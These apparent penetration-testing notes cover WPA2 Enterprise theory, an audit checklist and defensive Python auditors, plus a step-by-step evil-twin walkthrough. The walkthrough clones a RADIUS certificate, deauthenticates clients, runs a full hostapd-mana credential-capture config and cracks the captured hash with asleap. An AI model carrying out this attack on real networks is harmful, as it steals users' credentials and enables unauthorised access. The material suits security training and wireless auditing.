WPA Enterprise
WPA Enterprise Theory
WPA Enterprise, also known as WPA2 Enterprise, is a Wi-Fi security protocol that provides strong authentication and encryption for wireless networks. Unlike WPA-PSK, which uses a pre-shared key, WPA Enterprise requires a separate authentication server to verify the identity of each user before granting network access.
Here is a high-level overview of how WPA Enterprise works:
- The client device sends a request to join the network and provides its credentials, such as a username and password.
- The access point sends a request to the authentication server, asking it to verify the client's credentials.
- The authentication server uses a security protocol such as RADIUS (Remote Authentication Dial-In User Service) to verify the client's identity.
- If the client's credentials are correct, the authentication server sends a message to the access point granting network access.
- The client and access point use the WPA2 encryption protocol to create a secure connection and encrypt all data transmitted over the network.
WPA Enterprise provides several advantages over WPA-PSK, including more secure authentication and encryption, and the ability to manage user access more effectively. With WPA Enterprise, each user has a unique set of credentials, and their activity can be logged and tracked, making it easier to manage and secure the network.
To set up a WPA Enterprise network, you will need an authentication server, such as a RADIUS server, and appropriate client software installed on each client device. The authentication server must be configured with the appropriate security protocols and user account information. Once the network is set up, users will be required to enter their credentials to connect to the network, and their identity will be verified by the authentication server before network access is granted.
WPA Enterprise Checklist
Tunnel type:
- EAP-TLS: Strongest but hard to implement; server + client certificates (hard to manage because of the client certificates)
- EAP-TTLS: Second best together with PEAP; uses server certificates
- PEAP: Second best together with EAP-TTLS; uses MSCHAPv2
- LEAP: Weak, MSCHAPv1 challenge/response protocol, can be cracked with a wordlist (Cisco recommends EAP-FAST using MSCHAPv2)
- EAP-MD5: Weak, challenge/response protocol, can be cracked with a wordlist
Inner authentication type (strongest to weakest):
- MSCHAPv2
- MSCHAPv1 (requires the MD4 hash of the password to validate the challenge/response)
- CHAP (requires the plaintext password to validate the challenge/response)
- PAP (plaintext username/password sent)
Certificates:
- Server certificates used?
- Verified by the client?
- Client certificates used?
- Verified by the server?
- Unique certificate for each server/client, or the same one?
- Can client certificates be exported?
- Does the client display an error message on a wrong certificate, or no error?
- Can the user ignore errors or accept a self-signed certificate?
- Hostname configured to connect to ("Connect to these servers")? (Otherwise an attacker can buy a certificate from one of the listed allowed CAs)
- Do the PEAP settings enable automatic usage of Windows credentials?
Other:
- Enumerate users by sniffing EAP Identity packets or by brute forcing (e.g. domain username == e-mail username)
- RADIUS: weak shared secret (at least 22 characters, uppercase/lowercase/numbers/special characters, not in a common wordlist)?
- Enumerate the access point EAP configuration
- Does the client have a predefined wireless profile for the particular SSID?
- If PEAP is used: is Identity Protection enabled in the EAP configuration of the client (Windows 7 / 2008 R2)? (prevents the identity leaking in plaintext in traffic)
- Phish (WiFi) credentials by setting up an open access point with the same name and deauthenticating clients. You can use a captive portal for creds.
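Several of the client-side checklist items above (user can ignore certificate errors, no server hostname configured, no pinned CA, automatic Windows credentials, no identity protection) can be read straight out of an exported Windows wireless profile. The following is an added example, not part of the original notes: it audits a PEAP/MSCHAPv2 profile of the kind `netsh wlan export profile` produces. The profile text is a constructed template that approximates the layout of such an export; the audit matches elements by local name and ignores namespaces and nesting, so it does not depend on that approximation being exact. Finding codes, the `build_profile` helper and the sample thumbprint are inventions for this example.

```python
import xml.etree.ElementTree as ET
from typing import List, Optional

# Constructed template approximating a Windows WLAN profile export for PEAP (type 25)
# with MSCHAPv2 (type 26) inside. Element names are the ones used in such exports;
# their exact placement here is an approximation for this example.
PROFILE_TEMPLATE = """<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>{ssid}</name>
  <SSIDConfig><SSID><name>{ssid}</name></SSID></SSIDConfig>
  <MSM><security>
    <authEncryption><authentication>WPA2</authentication><encryption>AES</encryption><useOneX>true</useOneX></authEncryption>
    <OneX xmlns="http://www.microsoft.com/networking/OneX/v1"><EAPConfig>
      <EapHostConfig xmlns="http://www.microsoft.com/provisioning/EapHostConfig"><Config>
        <Eap xmlns="http://www.microsoft.com/provisioning/BaseEapConnectionPropertiesV1"><Type>25</Type>
          <EapType xmlns="http://www.microsoft.com/provisioning/MsPeapConnectionPropertiesV1">
            <ServerValidation>
              <DisableUserPromptForServerValidation>{disable_prompt}</DisableUserPromptForServerValidation>
              <ServerNames>{server_names}</ServerNames>{trusted_root}
            </ServerValidation>
            <Eap xmlns="http://www.microsoft.com/provisioning/BaseEapConnectionPropertiesV1"><Type>26</Type>
              <EapType xmlns="http://www.microsoft.com/provisioning/MsChapV2ConnectionPropertiesV1">
                <UseWinLogonCredentials>{winlogon}</UseWinLogonCredentials>
              </EapType>
            </Eap>
            <PeapExtensions>
              <PerformServerValidation xmlns="http://www.microsoft.com/provisioning/MsPeapConnectionPropertiesV2">true</PerformServerValidation>
              <AcceptServerName xmlns="http://www.microsoft.com/provisioning/MsPeapConnectionPropertiesV2">false</AcceptServerName>{identity_privacy}
            </PeapExtensions>
          </EapType>
        </Eap>
      </Config></EapHostConfig>
    </EAPConfig></OneX>
  </security></MSM>
</WLANProfile>
"""


def build_profile(ssid: str, *, disable_prompt: bool, server_names: str, trusted_root_ca: str,
                  winlogon: bool, identity_privacy: bool) -> str:
    """Hypothetical helper that fills the constructed template for the two cases below."""
    trusted = f"\n              <TrustedRootCA>{trusted_root_ca}</TrustedRootCA>" if trusted_root_ca else ""
    idp = ("\n              <IdentityPrivacy><EnableIdentityPrivacy>true</EnableIdentityPrivacy>"
           "<AnonymousUserName>anonymous</AnonymousUserName></IdentityPrivacy>") if identity_privacy else ""
    return PROFILE_TEMPLATE.format(ssid=ssid, disable_prompt=str(disable_prompt).lower(),
                                   server_names=server_names, trusted_root=trusted,
                                   winlogon=str(winlogon).lower(), identity_privacy=idp)


# Weak profile: user may accept an unknown server certificate, no server name, no pinned CA,
# Windows logon credentials sent automatically, outer identity sent in the clear.
WEAK_PROFILE = build_profile("CorpWiFi", disable_prompt=False, server_names="", trusted_root_ca="",
                             winlogon=True, identity_privacy=False)
# Hardened profile: silent failure on certificate mismatch, server name and CA thumbprint pinned
# (thumbprint is a constructed placeholder), explicit credentials, anonymous outer identity.
HARDENED_PROFILE = build_profile("CorpWiFi", disable_prompt=True, server_names="radius.corp.example",
                                 trusted_root_ca="00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff 00 11 22 33",
                                 winlogon=False, identity_privacy=True)


def _find_text(root: ET.Element, local_name: str) -> Optional[str]:
    """First element whose local (namespace-stripped) tag matches, or None if absent."""
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == local_name:
            return (el.text or "").strip()
    return None


def audit_peap_profile(xml_text: str) -> List[str]:
    """Return finding codes for settings that weaken server authentication or leak credentials."""
    root = ET.fromstring(xml_text)
    is_true = lambda v: v is not None and v.lower() == "true"
    findings = []
    perform = _find_text(root, "PerformServerValidation")
    if perform is not None and not is_true(perform):
        findings.append("NO_SERVER_VALIDATION")          # any server certificate accepted
    if not is_true(_find_text(root, "DisableUserPromptForServerValidation")):
        findings.append("USER_PROMPT_ALLOWED")           # user can click through a wrong certificate
    if not _find_text(root, "ServerNames"):
        findings.append("NO_SERVER_NAME")                # any name on a trusted certificate accepted
    if not _find_text(root, "TrustedRootCA"):
        findings.append("NO_TRUSTED_ROOT_CA")            # any root in the machine store accepted
    if is_true(_find_text(root, "UseWinLogonCredentials")):
        findings.append("WINLOGON_CREDS")                # domain credentials sent without user action
    if not is_true(_find_text(root, "EnableIdentityPrivacy")):
        findings.append("NO_IDENTITY_PRIVACY")           # real username visible in EAP-Identity
    if (_find_text(root, "encryption") or "").upper() == "TKIP":
        findings.append("TKIP_ENCRYPTION")
    return findings


if __name__ == "__main__":
    print("weak    :", audit_peap_profile(WEAK_PROFILE))
    print("hardened:", audit_peap_profile(HARDENED_PROFILE))
```

Run it against a real export by replacing the template with the file contents; because lookups are by local element name, a missing `TrustedRootCA` or an empty `ServerNames` is reported the same way whether the element is absent or present but blank.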
WPA Enterprise Practical
Step 1: Put your wireless interface (in this case wlan0) into monitor mode and scan for the target network
sudo airodump-ng wlan0
Note down: channel, BSSID, ESSID and AUTH (MGT = Enterprise)
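The same airodump-ng scan is what a defender uses to spot the rogue access point this walkthrough builds: a BSSID that is not in the AP inventory but advertises the corporate ESSID, either with AUTH MGT (a rogue EAP server) or as an open network (the captive-portal variant from the checklist). The following is an added example, not part of the original notes. It parses the CSV that `airodump-ng -w <prefix>` writes (`<prefix>-01.csv`), whose column layout is reproduced from the real tool; the BSSIDs, SSIDs, timestamps and the authorised-BSSID inventory are constructed for the example.

```python
import csv
from typing import Dict, List, Set

# Constructed airodump-ng CSV export. The column layout (and the blank line that separates the
# access-point table from the station table) follows the real file; all values are invented.
SAMPLE_AIRODUMP_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, MGT, -45,  120,    0,   0.  0.  0.  0,  8, CorpWiFi, 
00:11:22:33:44:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, MGT, -60,  110,    0,   0.  0.  0.  0,  8, CorpWiFi, 
de:ad:be:ef:00:01, 2024-01-01 10:03:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, MGT, -30,   40,    0,   0.  0.  0.  0,  8, CorpWiFi, 
de:ad:be:ef:00:02, 2024-01-01 10:04:00, 2024-01-01 10:05:00,  1,  54, OPN ,     ,    , -28,   35,    0,   0.  0.  0.  0,  8, CorpWiFi, 
aa:bb:cc:dd:ee:ff, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, WPA2, CCMP, PSK, -70,   90,    0,   0.  0.  0.  0,  5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

# Constructed AP inventory: the BSSIDs that legitimately serve the corporate SSID.
AUTHORISED_BSSIDS: Set[str] = {"00:11:22:33:44:01", "00:11:22:33:44:02"}


def parse_access_points(csv_text: str) -> List[Dict[str, str]]:
    """Return the access-point rows of an airodump-ng CSV as dicts keyed by stripped header names."""
    lines = [line.rstrip("\r") for line in csv_text.splitlines()]
    # The file may start with a blank line, so locate the AP header explicitly and stop at the
    # next blank line, which is where the station table begins.
    try:
        start = next(i for i, line in enumerate(lines) if line.startswith("BSSID"))
    except StopIteration:
        return []
    block: List[str] = []
    for line in lines[start:]:
        if not line.strip():
            break
        block.append(line)
    reader = csv.reader(block)
    header = [h.strip() for h in next(reader)]
    rows = []
    for row in reader:
        if len(row) < len(header):
            continue  # truncated line, e.g. a capture that was still being written
        rows.append({header[i]: row[i].strip() for i in range(len(header))})
    return rows


def find_rogue_aps(rows: List[Dict[str, str]], corporate_ssid: str,
                   authorised_bssids: Set[str]) -> List[Dict[str, str]]:
    """Flag every AP that advertises the corporate SSID from a BSSID outside the inventory."""
    findings = []
    for ap in rows:
        if ap["ESSID"] != corporate_ssid or ap["BSSID"].lower() in authorised_bssids:
            continue
        if ap["Privacy"] == "OPN":
            reason = "open network broadcasting the corporate SSID (captive-portal credential phishing pattern)"
        elif ap["Authentication"] == "MGT":
            reason = "unknown BSSID offering WPA-Enterprise (rogue EAP server / certificate impersonation pattern)"
        else:
            reason = f"unknown BSSID with {ap['Privacy']}/{ap['Authentication']} security"
        findings.append({"bssid": ap["BSSID"].lower(), "channel": ap["channel"],
                         "power": ap["Power"], "reason": reason})
    # Strongest signal first: a rogue AP is typically run close to its victims to win the association.
    findings.sort(key=lambda f: int(f["power"]), reverse=True)
    return findings


if __name__ == "__main__":
    for f in find_rogue_aps(parse_access_points(SAMPLE_AIRODUMP_CSV), "CorpWiFi", AUTHORISED_BSSIDS):
        print(f"[!] {f['bssid']} ch {f['channel']} {f['power']} dBm: {f['reason']}")
```

Feed it the CSV from a periodic scan and a current BSSID inventory; a second line of defence is a wireless IDS on the controller, but this catches the two patterns the checklist names with nothing more than the scan already being taken.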
Step 2:
- Capture packets with wireshark/tcpdump
- Deauth a client
Step 3:
sudo airmon-ng stop wlan0
Step 4:
- Search in Wireshark for tls.handshake.certificate or tls.handshake.type == 11
- In the Packet Details pane, open Extensible Authentication Protocol > Transport Layer Security, then open TLSv1 Record Layer: Handshake Protocol: Certificate
- Expand the Handshake Protocol: Certificate item, then Certificates (plural). Inside Certificates there are one or more entries named Certificate, each preceded by its length
- For each certificate, right-click and select Export Packet Bytes to save the data into a file with a .der extension.
Step 5: Inspect the exported certificate and convert it to PEM
openssl x509 -inform der -in CERTIFICATE_FILENAME -text
openssl x509 -inform der -in CERTIFICATE_FILENAME -outform pem -out OUTPUT_PEM.crt
Step 6:
- Switch to the root user and edit the [certificate_authority] fields to match the target CA certificate, so the generated certificate looks less suspicious to clients that inspect it.
sudo -s
cd /etc/freeradius/3.0/certs
nano ca.cnf
Step 7:
- Edit the [server] fields to match our target server certificate.
nano server.cnf
Step 8:
- (re)generate the certificate
rm dh
make
# if needed
make destroycerts
Step 9:
- create the hostapd-mana configuration file, /etc/hostapd-mana/mana.conf
# SSID of the AP
ssid=<target-ssid>
# Network interface to use and driver type
# We must ensure the interface lists 'AP' in 'Supported interface modes' when running 'iw phy PHYX info'
interface=wlan0
driver=nl80211
# Channel and mode
# Make sure the channel is allowed with 'iw phy PHYX info' ('Frequencies' field - there can be more than one)
channel=1
# Refer to https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf to set up 802.11n/ac/ax
hw_mode=g
# Setting up hostapd as an EAP server
ieee8021x=1
eap_server=1
# Key workaround for Win XP
eapol_key_index_workaround=0
# EAP user file we created earlier
eap_user_file=/etc/hostapd-mana/mana.eap_user
# Certificate paths created earlier
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
# The password is actually 'whatever'
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
# Open authentication
auth_algs=1
# WPA/WPA2
wpa=3
# WPA Enterprise
wpa_key_mgmt=WPA-EAP
# Allow CCMP and TKIP
# Note: iOS warns when network has TKIP (or WEP)
wpa_pairwise=CCMP TKIP
# Enable Mana WPE
mana_wpe=1
# Store credentials in that file
mana_credout=/tmp/hostapd.credout
# Send EAP success, so the client thinks it's connected
mana_eapsuccess=1
# EAP TLS MitM
mana_eaptls=1
Step 10:
- create the EAP user file referenced in the configuration file, /etc/hostapd-mana/mana.eap_user
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
- The first column indicates a specific user by username or, when the wildcard character (*) is used, any user. It can contain a domain name as well.
- The second column lists the protocols allowed for that user and authentication phase.
- The third column is optional and holds the password when a specific user is named.
- The fourth column, shown here as [2], indicates that the settings on this line apply to phase 2 authentication.
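The eap_user format above is hostapd's own and is used just as much when hostapd is the legitimate EAP server of a small network, where the phase-2 line should allow nothing weaker than MSCHAPv2. As an added example, not from the original notes or from hostapd, the parser below reads the two line shapes shown above (the `*` wildcard and a quoted identity, an optional quoted password and an optional `[phase]`) and reports which entries admit the inner methods ranked weak in the checklist. The sample file is constructed; the regex does not cover hostapd's other password forms (such as `hash:`), and the `WEAK_PHASE2` ranking follows the checklist rather than any hostapd table.

```python
import re
from typing import Dict, List, Optional

# Constructed eap_user file: the two lines from the notes above plus a comment and a named user.
SAMPLE_EAP_USER = """\
# phase 1: outer methods offered to any identity
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
"alice@corp.example" MSCHAPV2 "s3cret" [2]
"""

# identity (wildcard or quoted), methods, optional quoted password, optional [phase]
LINE_RE = re.compile(
    r'^(?P<ident>\*|"[^"]*")\s+(?P<methods>\S+)(?:\s+"(?P<password>[^"]*)")?(?:\s+\[(?P<phase>\d)\])?\s*$'
)

# Inner methods the checklist ranks as weak, with the reason (assumed mapping, not hostapd's).
WEAK_PHASE2: Dict[str, str] = {
    "TTLS-PAP": "plaintext username/password inside the tunnel",
    "TTLS-CHAP": "server needs the plaintext password; MD5 challenge/response",
    "TTLS-MSCHAP": "MSCHAPv1, server needs the MD4 hash of the password",
    "MD5": "EAP-MD5 challenge/response, crackable with a wordlist",
    "GTC": "token or password sent as-is inside the tunnel",
}


def parse_eap_user(text: str) -> List[Dict[str, object]]:
    """Parse eap_user lines into dicts; raises ValueError on a line the regex does not cover."""
    entries: List[Dict[str, object]] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: unrecognised eap_user entry: {raw!r}")
        ident = m.group("ident")
        entries.append({
            "identity": None if ident == "*" else ident.strip('"'),
            "wildcard": ident == "*",
            "methods": m.group("methods").split(","),
            "password": m.group("password"),
            "phase": int(m.group("phase") or 1),  # hostapd treats a line without [2] as phase 1
        })
    return entries


def weak_phase2_methods(entries: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Map each phase-2 identity (or '*') to the weak inner methods its line allows."""
    report: Dict[str, List[str]] = {}
    for e in entries:
        if e["phase"] != 2:
            continue
        weak = [m for m in e["methods"] if m in WEAK_PHASE2]
        if weak:
            report[str(e["identity"] or "*")] = weak
    return report


if __name__ == "__main__":
    for ident, methods in weak_phase2_methods(parse_eap_user(SAMPLE_EAP_USER)).items():
        for m in methods:
            print(f"{ident}: allows {m} ({WEAK_PHASE2[m]})")
```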
Step 11:
sudo hostapd-mana /etc/hostapd-mana/mana.conf
Step 12: Read the captured challenge/response from /tmp/hostapd.credout and pass it to asleap
asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4 -W /usr/share/john/password.lst